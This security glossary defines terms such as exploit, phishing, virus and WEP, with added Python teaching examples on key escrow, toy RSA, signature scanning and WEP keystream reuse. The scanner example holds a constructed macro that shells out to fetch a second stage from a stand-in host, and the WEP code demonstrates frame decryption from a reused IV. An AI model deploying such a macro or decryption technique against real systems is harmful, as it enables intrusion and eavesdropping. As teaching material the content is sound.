exploit A means of effectively using a vulnerability to bypass security or cause damage. For example, a vulnerability might be a bug in a web browser. An exploit would be a web page which uses the bug to send a malicious program to the user. See zero-day exploit.

fingerprint A unique identifying number for an encryption key or certificate. Basically, the fingerprint is a quick way of verifying that you are using the correct key and that it really belongs to who you think it does. For example, if you want to send someone confidential information, you can look up their public key (see Public Key Cryptography) in a directory. To make sure that the key in the directory is correct (and not fraudulent), you can look at the key's fingerprint and verify it by some other method, such as calling the person on the phone, checking the back of their business card, seeing if it is listed on their web page, and so forth. Once you have verified the key the first time, you can add it to your own key ring and tell your application that you trust it. Similarly, you should list your key's fingerprint prominently to make it easier for people to verify your public key.

firewall Controls traffic between an inside network (Intranet), such as a home or business, and an outside network, such as the Internet. A firewall keeps unwanted traffic out and protects computers on the inside. A hardware firewall is built into a router or other device. A software firewall is a second line of defense running directly on the server or PC it protects, only allowing traffic to or from certain applications (e.g. a web browser). A firewall may provide for a DMZ to provide limited protection for Internet services such as an online store.

HIPAA The Health Information Portability and Accountability Act is a US Federal Law [Usc-1996] which, for our purposes, places requirements on the use, disclosure, retention, and protection of private health records. In particular, the Security Rule (issued in 2003) lays out three types of safeguards required for compliance: the Administrative Safeguards (defined policies, management, and auditing), the Physical Safeguards (restricting access to records and equipment), and the Technical Safeguards (technological protections for networks, computers, and communications) [Dhhs-2003]. Businesses may be required to comply with HIPAA if they manage private health information (obviously including medical organizations, but this can also include components of organizations managing information related to employee health plans) or if they are subcontractors of such businesses.

For the most part, the HIPAA Security Rule avoids making specific technology requirements (which would quickly become obsolete) by stating what must be accomplished rather than how it must be accomplished, such as requiring that networks must be protected from intrusion and that documents must be able to be verified to prevent tampering. The organization must further document their actual practices and self-audit on a regular basis.

A number of related documents are available from the US Health and Human Services Web Site25.

image A drive image or image is a complete copy of a hard drive or a partition on a hard drive, including the raw filesystem, all files, free space, and deleted files. Images are used in backup and recovery to quickly restore a hard drive from a backup. It is common, for instance, for a system administrator to have an image of a new system with Windows and standard applications rather than installing each system individually. Images are also used in computer forensics to allow security personnel or law enforcement to examine a stored copy of a hard drive and all of its contents.

Intranet An internal network, such as a business or home. Intranets are connected to other networks, such as the Internet, by a router.

ISF Standard of Good Practice The Information Security Forum26 Standard of Good Practice for Information Security [Isf-2005a] is a standard of information security best practices published by an international consortium. Although they use the term “information security” to describe the document, they are more focused on digital data than ISO/IEC 17799:2005. Like other security standards, they avoid committing to specific technical recommendations, concentrating more on policy and practice. They do, however, do a good job of keeping up with changing security issues, such as instant messaging and recent virus threats in the current (4.1) version. This document also does an excellent job of not getting bogged down in jargon (either its own or computer/technical).

The ISF standard overlaps with and is complementary to aspects of both COBIT® and ISO/IEC 17799:2005.

ISO/IEC 17799:2005 An international business process standard for best practices in information security. Note that this is a broader term than “data” security and includes information in any form, such as paper and security of physical storage. The standard provides guidance on risk management processes, policy development, management and approval structures, access controls and classification levels, monitoring and auditing. Like most such standards, it concentrates more on what to manage than precisely how and avoids specifying specific controls or technologies [IsoIec-2005].

This standard overlaps with and is complementary to aspects of both COBIT® and the ISF Standard of Good Practice. ISO/IEC 17799 was first published in 2000 as an international standardization of the British Standard (BS) 7799-1:1999, and will be renamed to ISO/IEC 27002 in 2007.

key escrow Key escrow can be used to mean any of several different technologies. As used in this paper, it means a process where multiple passwords are used to access the same document or data. Each password works individually, so you can set up an employee password and a master password, for instance, so that sensitive data can be accessed even if the employee is not available (or no longer works for you). In a sense, key escrow trades one issue for another, in that it creates a single master password which can fall into the wrong hands. The master passwords should be used very seldom, so that they are not likely to be captured, and different passwords should be used for different sets of data to minimize damage if a password leaks (or is misused).
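The escrow arrangement the entry describes, two passwords that each unlock the same data, as an added example that is not code from the article: the document is protected by one random data key, and that key is stored twice, once wrapped under the employee's password and once under the master password. Either password recovers the identical data key; a wrong password is detected rather than silently yielding garbage. This uses only the Python standard library; the wrapping construction (PBKDF2-derived key XORed over the data key, with an HMAC tag) is an assumption chosen to keep the example self-contained, and a real tool would then encrypt the document with that data key using a standard cipher. The passwords are constructed for illustration.

```python
"""Key escrow as two passwords that unlock the same data key.

Added example, not code from the article. It uses only the Python
standard library: each password is stretched with PBKDF2 and used to
wrap one random "data key"; either password recovers the same data key,
which is what a real tool would then use with a standard cipher to
encrypt the document. Passwords below are constructed for illustration.
"""
import hashlib
import hmac
import os
import secrets

ITERATIONS = 200_000   # PBKDF2 work factor; raise as hardware allows


def _derive(password, salt):
    """Stretch a password into a 32-byte wrapping key."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def wrap_key(data_key, password):
    """Wrap data_key under password; returns a slot (salt, wrapped, tag)."""
    salt = os.urandom(16)
    kek = _derive(password, salt)
    # One-time XOR with a freshly derived key (fresh salt for every wrap).
    wrapped = bytes(a ^ b for a, b in zip(data_key, kek))
    tag = hmac.new(kek, wrapped, "sha256").digest()   # detects a wrong password
    return salt, wrapped, tag


def unwrap_key(slot, password):
    """Recover the data key from a slot, or return None if the password is wrong."""
    salt, wrapped, tag = slot
    kek = _derive(password, salt)
    if not hmac.compare_digest(tag, hmac.new(kek, wrapped, "sha256").digest()):
        return None
    return bytes(a ^ b for a, b in zip(wrapped, kek))


def create_escrow(employee_password, master_password):
    """Return (data_key, slots): one slot per password, both opening the same key."""
    data_key = secrets.token_bytes(32)
    slots = [wrap_key(data_key, employee_password),
             wrap_key(data_key, master_password)]
    return data_key, slots


def open_escrow(slots, password):
    """Try each slot; the first one that accepts the password yields the data key."""
    for slot in slots:
        key = unwrap_key(slot, password)
        if key is not None:
            return key
    return None


if __name__ == "__main__":
    key, slots = create_escrow("employee-pass-constructed", "master-pass-constructed")
    print(open_escrow(slots, "employee-pass-constructed") == key)   # True
    print(open_escrow(slots, "master-pass-constructed") == key)     # True
    print(open_escrow(slots, "wrong-password"))                     # None
```

Because the data key itself never depends on either password, the employee's password can be changed, or their slot removed when they leave, without re-encrypting the documents; the master slot is untouched. The trade-off the entry warns about is visible too: whoever holds the master password opens every document whose escrow shares it, which is the reason to use different master passwords for different sets of data.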

key logger A program which tracks the use of a computer, recording typing, web sites visited, and especially, capturing usernames and passwords. Keyloggers either record the data locally and must be retrieved periodically (this has been common in Internet cafes and copy centers) or will automatically send their information to their controller. Key loggers may be installed by malware or directly by someone with access to the computer, including, in some cases, by employers to track employee use of a computer.

malware A general term for software that violates privacy, breaches security,
and damages computers, including viruses, spyware, and trojan
horses. The distinction between these types is blurring because one
type of malware will often enable and spread other kinds.

man-in-the-middle The attacker performs as an intermediary between two parties without their being aware of it; the attacker can copy and modify secure communications at will.

Alice and Bob are trying to communicate securely. Mallory poses as Bob, and Alice gives Mallory the password they will use. Mallory makes up a new password to give to Bob. Mallory now takes all coded messages from Alice, reads them, reencodes them, and sends them on to Bob, doing the same going in the reverse direction. Mallory can also modify the messages at any time without anyone the wiser.

In phishing schemes, the attacker poses as a banking site, tricks the user into logging into the fake site, and passes the name and password on to the real bank, sending the user the bank's responses. The attacker can now monitor and modify any of the user's banking activities. To the user, everything looks normal. Network services have a number of ways to reduce the chance of a man-in-the-middle attack, but many of them involve authenticating the two ends of the conversation in some way, and user vigilance is essential. Making sure that the URL and SSL certificate are correct for a secure website, noting suspicious communications, calling a colleague to verify that an encryption key belongs to them (by verifying its fingerprint, a unique identifying number), and so forth, will quickly derail attackers.

open The Carnegie Mellon Software Engineering Institute's Open Systems glossary defines “open” as follows:

    The specification of a component is open if (1) its interface specification is fully defined and available to the public, and (2) this specification is maintained by a group consensus process.
    —[SeiCm-2007]

An “open system” is a system made up of components which are well-specified and, at least theoretically, interchangeable.

Most disagreements in the definition of “open” center on the definition of “publicly available”. Open does not necessarily imply “free”. For instance, source code to a system may be “open” to and controlled by the consensus of a very select group, or implementation of an “open” standard may require licensing of patents or raise other legal issues (e.g. GIF, MP3, AAC). The word is often used as a marketing ploy and should be treated with a degree of skepticism. See further discussion under standard and open source.

open source Open source is a system and a movement of distributed software development where full source code for systems is publicly available and effort is advanced by the donations of many individuals and organizations. In many ways, this is actually not a new system, but closely mirrors the way much of the Internet infrastructure was developed in the university systems and scattered corporate laboratories. Contrary to popular conception, many contributors to open source are not hackers in garages, but rather professionals who are funded by their organizations to work on public projects. Among the benefits to the organization are that individual efforts are multiplied, products are peer reviewed, and the organization is not solely responsible for future maintenance. If support is needed, it can be purchased from multiple competing sources or provided in house. A large pool of open source code acts as a ready base for customized software.

Open source is not to be confused with “public domain”, which is non-copyrighted. Open source is copyrighted, but under a license which provides for modification and redistribution, generally under “share-alike” terms which mean that you must license changes under the same terms you received them, giving back to the common pool. (Open source products may be freely used alongside commercial and proprietary works.)

There are a number of nearly open source “shared source” or “community source” licenses which are more restrictive and may result in a contributor losing access to their own work or coming under other surprising restrictions. The Open Source Initiative maintains a definition of what constitutes an open source license and approves individual licenses for use in the community [Osi-2006]. The best-known open source license is the General Public License, or GPL, which is currently being revised into its 3rd version with broad industry input. The main goals include improving protection against patent litigation, a growing concern with software of all kinds.

Because of the many-eyes approach, open source can be more secure than closed-source software. It is also much more difficult to sneak backdoors into a peer-reviewed and heavily change-controlled process. However, there are always good and bad products, and, since open source projects are visible from the moment of inception, there are many projects which are not ready for public use by any but the most adventurous. High-profile and long-term open source projects like Linux and the Apache web server rival any other product for quality and will often receive large donations of funding, equipment, or functionality from diverse sources. As a noted example, the SELinux Role-Based Security module now included in most Linux systems was developed and donated by the National Security Agency.


Payment Card Industry Data Security Standard A data security standard for merchants who handle credit card data maintained by the PCI Security Standards Council. The individual card service providers (e.g. Visa, Mastercard) determine which entities must comply and enforce compliance. The standard defines requirements for providing a secure network, creating document retention policies, restricting access to data, and so forth. The PCI DSS takes an “as little as possible for as short a time as possible” approach to storing private customer data. See the PCI DSS FAQ online [PciSsc-2007] or the standard itself [PciSsc-2006].

phishing A scheme whereby a forged email is sent purporting to be from a business you have a relationship with (a bank or vendor, for instance) with the intent of taking you to a fake internet site and getting you to provide personal information which is then used to steal money or goods. A typical scheme involves telling the recipient that something is wrong with their account and that they need to verify sensitive account information. Phishing is currently one of the most lucrative Internet crimes.

pretexting The practice of impersonating a person or entity in order to obtain more information about them, such as impersonating a phone customer to get copies of phone records or impersonating a boss to get a password changed. Among hackers and security professionals, this is also known as human engineering.

Public Key Cryptography A system of encryption where everyone has a public key and a private key (each is a file). The public key is used to encrypt a document, while the private key is used to read it. The public key is published freely, but the private key must be hidden (and generally requires a password to be used). The wonderful thing about this system is that you do not need to worry about how to get a secret password to someone. After all, if you could get a password to someone secretly and safely, why not send the whole document that way? In this case, you can just send someone your public key without worrying about anyone intercepting it. Public Key Cryptography is especially useful in secure email systems.

Public Key Cryptography can also be used for digital signing, also called non-repudiation. A person uses their secret key to sign a document and anyone else can use that person's public key to verify the signature. The signature proves that the document was signed and has not been changed. Digital signatures can be used to run digital notary services which can prove that a particular document existed at a specific time and has not been altered by anyone else.
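The mechanics of this entry and of the fingerprint entry above, as one added example that is not code from the article or from any real cryptographic product: encrypt with the public key and decrypt with the private key, sign with the private key and verify with the public key, and check a public key's fingerprint against a value obtained some other way (over the phone, from a business card). It is textbook RSA with two fixed small primes and no padding, which shows the ideas but is not usable as real cryptography; real tools (GnuPG, S/MIME, TLS) use much larger keys with padding. The "n:e" form hashed for the fingerprint is an assumption; real systems hash a standard key encoding.

```python
"""Toy public-key cryptography plus key fingerprints.

Added example (not from the article). Textbook RSA with fixed, tiny
primes and no padding: it shows the mechanics of public/private keys,
signing and fingerprint checks, and is not usable as real cryptography.
"""
import hashlib
import hmac

# Mersenne primes 2**31-1 and 2**61-1: fine for a demo, far too small for use.
P, Q = 2**31 - 1, 2**61 - 1


def make_keypair(p=P, q=Q, e=65537):
    """Return (public, private) where public = (n, e) and private = (n, d)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)             # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(public, message: bytes) -> int:
    """Anyone holding the public key can encrypt a short message."""
    n, e = public
    if len(message) > (n.bit_length() - 1) // 8:
        raise ValueError("message too long for this toy key")
    return pow(int.from_bytes(message, "big"), e, n)


def decrypt(private, ciphertext: int) -> bytes:
    """Only the private-key holder can recover the message."""
    n, d = private
    m = pow(ciphertext, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def sign(private, message: bytes) -> int:
    """Signature: the hash of the message raised to the private exponent."""
    n, d = private
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)


def verify(public, message: bytes, signature: int) -> bool:
    """Anyone can check with the public key that the message is unaltered."""
    n, e = public
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == h


def fingerprint(public) -> str:
    """Short, unique identifier of a public key: a hash of its canonical form.

    The "n:e" text form is an assumption for this demo. Shown as
    colon-separated byte pairs, the way GnuPG and OpenSSH display them.
    """
    n, e = public
    digest = hashlib.sha256(f"{n}:{e}".encode()).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fingerprint_matches(public, out_of_band: str) -> bool:
    """Compare a key from a directory against a fingerprint read out over the phone."""
    def normalize(s):
        return s.replace(":", "").replace(" ", "").lower()
    return hmac.compare_digest(normalize(fingerprint(public)), normalize(out_of_band))


if __name__ == "__main__":
    pub, priv = make_keypair()
    print(decrypt(priv, encrypt(pub, b"PIN:4321")))          # b'PIN:4321'
    sig = sign(priv, b"Invoice 17 approved")
    print(verify(pub, b"Invoice 17 approved", sig))          # True
    print(verify(pub, b"Invoice 17 approved for $9,999", sig))  # False
    print(fingerprint(pub))
```

Two points the code makes concrete: changing even one character of a signed message makes verification fail, which is the property a digital notary relies on; and the fingerprint is computed from the key alone, so a key substituted in a directory by a man-in-the-middle produces a different fingerprint from the one the real owner reads out to you.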

root-kit A set of programs installed on a computer to let someone take full control of it and hide their presence. Often delivered by a trojan horse or similar.

router A device which routes traffic between two networks. You can think
of a router as a highway interchange or on-ramp. A router will often
function as a firewall.

secret Private, uniquely identifying information or objects used to gain entry or access information. In security or cryptographic terms, a secret can include a physical key, the combination to a lock, a password, an encryption key, an access card or other device. Often, identifying information such as a social security number or mother's maiden name is treated as a secret by businesses, but such information is inherently insecure since you must give it out many times in order to do business.

security by obscurity Keeping elements of a security plan secret in order to increase security
and prevent attackers from finding flaws, such as the design of
encryption algorithms or the source code of a program or operating
system. Often, the secrecy acts as no more than a speed bump to an
attacker and the benefit of standard, peer-reviewed and proven defense
far outweighs the temporary advantage. Criminals have many ways of
finding flaws in secret systems, including stealing source code from
vendors, and there are many of them looking. The design of a security
system should assume that the attackers know all secrets with the
exception of the actual keys or passwords. Security by obscurity can
add to an otherwise secure system, such as by hiding from the attacker
which standard defense is being used in order to slow down automated
tools.

silver bullet A high-tech, whiz-bang solution to everything in one box. Many vendors like to tell you that their product and their product alone will fix all of your problems. In most cases, they produce a single point of failure where one mistake nullifies all of your security. As an example, if you have an expensive product to keep Internet hackers out, what happens when the attacker gets physical access to your PC? or hijacks the dialup account of your employee? or steals your salesperson's laptop? or is an employee? It is often better to have a defense in depth where multiple simpler defenses interlock to protect the whole.

sneakernet Transferring documents by disk (floppy, CD, USB drive, etc.) and
foot-power (sneakers). Often used by employees to avoid technical
problems or security restrictions, it can also be used to increase
security by avoiding sending sensitive documents over the Internet.

SPAM A term for bulk unsolicited email, usually commercial, which can be compared to physical junkmail. Unlike postal junkmail, however, email recipients and operators of mail servers pay the postage, making it possible for SPAMers to send millions of messages at little or no cost. Also unlike postal junkmail, a large percentage of SPAM content is illegal. The term comes from a 1975 Monty Python skit27 as related to something which is repeated endlessly and cannot be gotten rid of.

Hormel Foods has tried unsuccessfully in court to block the use of the term SPAM since they hold the trademark in their canned meat product.

spyware Software that covertly monitors the user's actions, particularly websurfing habits, mainly for marketing purposes. Spyware is usually contained in and installed as part of disreputable freeware or shareware software that can be downloaded. The primary difference between spyware and a trojan horse is that the intent of spyware is commercial, not to commit criminal acts or damage the computer per se. The line becomes blurred because poorly written spyware often does damage or becomes a means of infection by accident. Like viruses or trojan horses, spyware will often take steps to make its removal difficult.

standard When used without an article, as in “standard practice” or “standard technology”, I am referring to common or customary use, which may include de-facto standards. Otherwise, “a standard” is a published specification for a technology, product, or practice. In order to be effective, a standard must provide some means for measuring conformance, whether a particular implementation meets the standard, such as a measure of effectiveness for a security standard or of interoperability for a product standard. In general, standards bodies accept specifications only for existing products or practices (providing proof of viability), and specifications will often begin in a trade consortium and wend their way up through national and then international standards bodies as they gain adoption. An open standard is one where the specification is publicly available, maintained by group consensus, and available for any interested party to implement.

Patents and other legal restraints can be significant barriers to open standards. In the past, companies have pushed for their specifications to be adopted by the industry only to turn around and threaten law suits for patent infringement after it achieves widespread use (e.g. GIF, MP3). Standards organizations have begun to adopt rules requiring participants to grant patent rights to the standards body and standards implementors. Often, these rights are under “Reasonable and Non-Discriminatory” (RAND) policies, which seek to prevent the holder from using patents for trade-restraint and enforce broad licensing. Despite this, RAND-compatible policies can still cause problems for broad standards adoption, typically preventing adoption by open source systems (due to license incompatibility) and often harboring dangerous fine print. Any RAND patent licenses or covenants-not-to-sue should be examined by an attorney to ensure that they provide adequate protection. A better solution is to stick to standards which require full and open patent licensing terms.

Standards encourage choice in the marketplace by ensuring that consumers can purchase interchangeable products, are assured a level of quality, and can avoid vendor lock-in. Choice among standards (having multiple standards which do the same thing) is often bad, causes marketplace confusion, and can encourage vendor lock-in.

trojan horse Historically, the Trojan Horse was a large wooden statue that Odysseus tricked the Trojan army into taking inside their city. At night, Achaean soldiers came out of the horse and ended a ten year siege in several bloody hours. In computer terms, a trojan horse is a program or file which you are tricked into downloading thinking it is something else, such as a card game or a video file. When used, the trojan horse invades your computer and leaves the gates open for a follow-on attack. A trojan horse differs from a virus in that it has no means to spread, although it may download other tools once it is installed.

virtual machine A simulated computer running inside a real computer. A virtual
machine (VM) appears to have its own hard drive, operating system,
and applications, but they actually exist as files on the real computer
running them (the host). For instance, it is possible for a Windows
Vista host computer to run two virtual machines, each with Windows
XP and a web server.

The appeal of virtual machines is that they can be created and
destroyed quickly and easily when needed, that they can be moved
from server to server, and that they allow services to be separated for
greater security and reliability. Instead of one server with a database
and a webserver, you can run two VMs, one with a web server and the
other with the database. Failure of one VM will not cause the other to
fail, and an attacker who gains control of one cannot necessarily access
the other machine or the host (though the virtualization software itself
must be kept patched, since a flaw in it can break that separation). A
problem with a virtual machine can sometimes be fixed by destroying and
recreating it from a backup, which is a simple process.

The downside of virtual machines is that they are slower than the
same software running directly on the hardware and use more disk
space, so total hardware is more expensive. You must also typically
pay for a software license (operating system and applications) for
each virtual machine rather than for each physical computer. Some
operating systems have licenses prohibiting them from being used in
virtual machines (e.g. Mac OS X, some versions of Windows Vista),
while others (Linux, FreeBSD) can be used at no additional cost.

Virtual Private Network An encrypted connection over the Internet between two networks,
often used by telecommuters to connect to their corporate office.
A VPN is usually started on a user's home PC or firewall device
and connects to a business firewall on the other end. The connection
creates a kind of “tunnel” between the two networks, acting as if the
user's home PC were connected directly to the business, while at the same
time preventing someone from eavesdropping on the traffic. VPNs
can be convenient and quite effective, but must be used with caution:
the tunnel extends your network's boundary to the far end, so a home
user with an unsecured wireless access point or an infected PC can
accidentally give their entire neighborhood direct access to your
business network via the VPN connection.

virus A biological virus invades a cell and turns it into a mini virus factory;
the copies then go on to invade other cells. Computer viruses
attach themselves to computer programs in order to copy themselves. Modern
computer viruses can also infect office documents like memos and
spreadsheets and spread via email, because common office programs
(e.g. MS Office) support macros which act like mini programs.
Viruses cannot infect pure text, plain email, or documents without
scripts or macros. Viruses spread by email will typically read the
recipient's address book and mail copies of themselves to other people.

Virus scanners detect viruses by looking for specific patterns
(fingerprints or signatures) in infected files. For this reason,
virus scanners can only detect viruses which have already been
discovered or that are very similar to known viruses. New viruses will
not be detected until an update is available from the vendor, so a
scanner that reports nothing has only said that it found nothing it
already knows about.

Modern viruses modify the PC they infect to hide themselves and
prevent removal, even from virus scanning software. For this reason,
it is often necessary to reinstall the operating system from known-good
media, and restore data from a backup taken before the infection, to
completely remove a virus once it infects your system.
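The three ways a scanner can recognise a sample, and why a renamed copy slips past the first two, as an added example in Python (not code from the original page or from any vendor's product). The samples are constructed macro text, not real malware, and the rule names are invented; the point is the behaviour of each tier, not the particular bytes.

```python
"""Toy signature scanner showing the three tiers of virus detection.

Added example, not from the original page. The samples below are constructed
Office-macro text, not real malware; the rule names are invented.
"""
import hashlib
import re

# Constructed samples. KNOWN_BAD launches a shell when the document opens.
KNOWN_BAD = (b'Sub AutoOpen()\n'
             b'    Shell("cmd /c start http://example.invalid/stage2")\n'
             b'End Sub\n')
VARIANT = KNOWN_BAD.replace(b"AutoOpen", b"Document_Open")  # same behaviour, new bytes
CLEAN = b'Sub AutoOpen()\n    MsgBox "Welcome"\nEnd Sub\n'
ADMIN_TOOL = b'Sub RunBackup()\n    Shell("backup.bat")\nEnd Sub\n'  # legitimate Shell() use

# Tier 1: exact-file signatures (a hash). Catches one specific sample, nothing else.
EXACT_HASHES = {hashlib.sha256(KNOWN_BAD).hexdigest(): "Example.Macro.A"}

# Tier 2: pattern signatures. Survive small edits (a different URL, extra spaces)
# but still key on bytes the vendor picked from the one sample it has seen.
PATTERNS = {
    "Example.Macro.A.gen": re.compile(rb"Sub AutoOpen\(\).*?Shell\(", re.DOTALL),
}

# Tier 3: heuristics. Describe behaviour ("any macro that calls Shell") rather
# than bytes: broader, so it also catches the renamed variant, but noisier.
HEURISTICS = {
    "Heuristic.MacroShell": re.compile(rb"Sub \w+\(\).*?Shell\(", re.DOTALL),
}


def scan(data: bytes, patterns=PATTERNS):
    """Return the names of every rule that fires, hash first, then patterns.

    An empty list means 'nothing we know about matched', not 'clean'.
    """
    hits = []
    exact = EXACT_HASHES.get(hashlib.sha256(data).hexdigest())
    if exact:
        hits.append(exact)
    for name, regex in patterns.items():
        if regex.search(data):
            hits.append(name)
    return hits


def scan_with_heuristics(data: bytes):
    """Same scan with the behavioural rules switched on."""
    return scan(data, {**PATTERNS, **HEURISTICS})


if __name__ == "__main__":
    for label, sample in [("known", KNOWN_BAD), ("variant", VARIANT),
                          ("clean", CLEAN), ("admin tool", ADMIN_TOOL)]:
        print(f"{label:10s} signatures={scan(sample)} "
              f"heuristics={scan_with_heuristics(sample)}")
```

Tier 1 misses as soon as a single byte changes; tier 2 survives a changed URL but not a renamed event handler; tier 3 catches the renamed variant but also flags a legitimate backup macro, which is the false-positive cost vendors trade against. None of the tiers detects a family the vendor has never seen, which is the "update from the vendor" gap described in the entry above.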

vulnerability A weakness in a security design or procedures which could potentially
be exploited, on purpose or by accident. A vulnerability can exist for
some time without a known way of effectively exploiting it, or an
exploit may be discovered at the same time. See exploit and zero-day
exploit.

WEP Wired Equivalent Privacy, the encryption scheme built into the first
generation of wireless networking (the original 802.11 standard and
802.11b). It was intended to make wireless networking as private as a
wired network. It did no such thing: its design reuses the same RC4
keystream whenever its short 24-bit initialization vector repeats, and
the shared key itself can now be recovered from a few minutes of
captured traffic with freely available tools [TewsEtAl-2007]. Wireless
traffic can also be tapped from a considerable distance, which a wired
network cannot. WEP should be treated as no encryption at all; users
should either upgrade to newer equipment using WPA or WPA2 encryption,
or structure their network so that wireless networks are not trusted
(see the section called “Disappearing Boundaries”).
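The keystream-reuse flaw can be shown in a few lines. The following is an added example in Python, not code from the page or from the cited paper: it demonstrates the older and simpler WEP problem (a 3-byte IV repeated under the same key), not the key-recovery attack of [TewsEtAl-2007]. The secret key, the IV and the frame contents are constructed, and the frame's CRC-32 integrity check is left out because it plays no part in this flaw.

```python
"""Keystream reuse in WEP (added example; simplified: no ICV/CRC)."""

# Every IP packet carried by 802.11 starts with this LLC/SNAP header, so the
# first 8 plaintext bytes of most frames are known to an eavesdropper.
SNAP_HEADER = bytes.fromhex("aaaa030000000800")
IV_SPACE = 2 ** 24   # WEP's initialization vector is 3 bytes and is sent in the clear


def rc4(key: bytes, length: int) -> bytes:
    """Standard RC4 keystream generator, the cipher WEP is built on."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-frame RC4 key is IV || shared secret; the frame carries the IV in the clear."""
    keystream = rc4(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return bytes(c ^ k for c, k in zip(body, rc4(iv + secret, len(body))))


def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under one IV share a keystream, so XORing the ciphertexts
    cancels it and leaves plaintext_a XOR plaintext_b. No key is needed."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs; keystreams differ")
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))


def keystream_from_known_frame(frame: bytes, known_plaintext: bytes) -> bytes:
    """If the eavesdropper knows one frame's content, it gets the keystream for that IV."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


def iv_collision_probability(frames: int) -> float:
    """Birthday bound: chance that at least two of `frames` randomly chosen IVs repeat."""
    p_all_distinct = 1.0
    for i in range(frames):
        p_all_distinct *= (IV_SPACE - i) / IV_SPACE
    return 1.0 - p_all_distinct


def demo() -> bytes:
    """Recover a victim's frame from one frame whose content the attacker already knows."""
    secret = bytes.fromhex("0badc0de01")               # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")                        # the IV the access point reused
    known = SNAP_HEADER + b"ping sent by the attacker"  # attacker chose this content
    victim = SNAP_HEADER + b"password=hunter2"          # what the attacker wants
    f_known = wep_encrypt(secret, iv, known)            # the access point's side
    f_victim = wep_encrypt(secret, iv, victim)
    keystream = keystream_from_known_frame(f_known, known)   # attacker's side: no secret used
    return decrypt_with_keystream(f_victim, keystream)


if __name__ == "__main__":
    print(demo())
    print(f"P(IV repeat among 5000 frames) = {iv_collision_probability(5000):.2f}")
```

The secret is used only to simulate the access point; the recovery functions never see it. Once two frames share an IV, their ciphertexts XOR to the XOR of their plaintexts, and if the attacker knows one plaintext (say, a ping they sent into the network from outside) the other frame is read directly. With only 2^24 IVs, `iv_collision_probability(5000)` shows a repeat is already more likely than not among a few thousand randomly chosen IVs, and a busy access point sends that many frames in minutes.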

wireless networking Connecting computers and peripherals with radio-based networks.
Wireless networking usually refers to the technology commonly
called AirPort™ (an Apple trademark) or WiFi™, technically the
802.11 family of standards. Recently, people have also begun using
“wireless network” to refer to cellphone networks and cellphone-based
Internet access.

There are several different 802.11 standards which operate at
different speeds and radio frequencies. This is confusing to many
consumers. A brief comparison is provided on webopedia. For
our purposes, it is important to note that 802.11b, one of the older
standards which is still in common use, shipped with security (WEP)
which is now effectively useless against attackers with standard tools
[TewsEtAl-2007]. WPA was designed so that much WEP-era hardware could
support it after a firmware update, so what matters is the encryption
actually in use, not which 802.11 letter the device carries.

Wireless networks avoid costly wiring and are very convenient,
especially for small businesses leasing space and for travellers with
laptop computers. However, there are a number of security issues with
wireless networks, including readily available tools for breaking into
and snooping on them. When using your laptop in a public place, it is
possible to have your laptop hijacked if you accidentally leave wireless
on (vendors have acted to reduce this problem). Using public wireless
networks may allow others to record your Internet traffic, including
email and web pages visited; using SSL to access web pages and email
makes this much more difficult, and a VPN back to the office protects
the rest of your traffic.

workflow A workflow is the sequence of steps that a particular document goes
through in the course of a business process, from start to completion.
For example, a press release may go through one or more stages
of drafting and review, require final approval, get published, then
be archived. In workflow automation, roles are defined, such as owner,
editor, reviewer, and approver, individuals are assigned to roles, and
the roles are given appropriate access rights to the document as it
passes from one stage to the next. Members of a workflow team are
often given the ability to assign roles to other individuals; for instance,
a document's owner may assign reviewers. Contrast this to ACLs,
where access rights are typically centrally managed and do not change
as the document moves from stage to stage.
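The role-per-stage idea can be made concrete with a small model. This is an added example in Python, not code from the page or from any workflow product; the stages, roles and rights table are assumptions chosen to match the press-release description, and the user names are constructed.

```python
"""Stage-based rights for a press-release workflow (added example)."""
from dataclasses import dataclass, field


class WorkflowError(Exception):
    """Raised when a user attempts an action their role does not allow at this stage."""


# Rights each role holds at each stage (assumed table). Note that 'edit' exists
# only in 'draft': the same person keeps the editor role but loses the right.
STAGE_RIGHTS = {
    "draft":     {"owner": {"read", "edit", "submit", "assign"},
                  "editor": {"read", "edit"}},
    "review":    {"owner": {"read", "assign"},
                  "editor": {"read"},
                  "reviewer": {"read", "comment", "pass_review"}},
    "approval":  {"owner": {"read"},
                  "approver": {"read", "approve", "reject"}},
    "published": {"owner": {"read", "archive"},
                  "editor": {"read"}, "reviewer": {"read"}, "approver": {"read"}},
    "archived":  {"owner": {"read"}, "approver": {"read"}},
}

# (current stage, action) -> next stage
TRANSITIONS = {
    ("draft", "submit"): "review",
    ("review", "pass_review"): "approval",
    ("approval", "approve"): "published",
    ("approval", "reject"): "draft",
    ("published", "archive"): "archived",
}


@dataclass
class Document:
    title: str
    owner: str
    stage: str = "draft"
    body: str = ""
    roles: dict = field(default_factory=dict)   # user -> set of role names

    def __post_init__(self):
        self.roles.setdefault(self.owner, set()).add("owner")

    def rights(self, user: str) -> set:
        """Union of the rights of every role the user holds, at the current stage."""
        allowed = set()
        for role in self.roles.get(user, ()):
            allowed |= STAGE_RIGHTS[self.stage].get(role, set())
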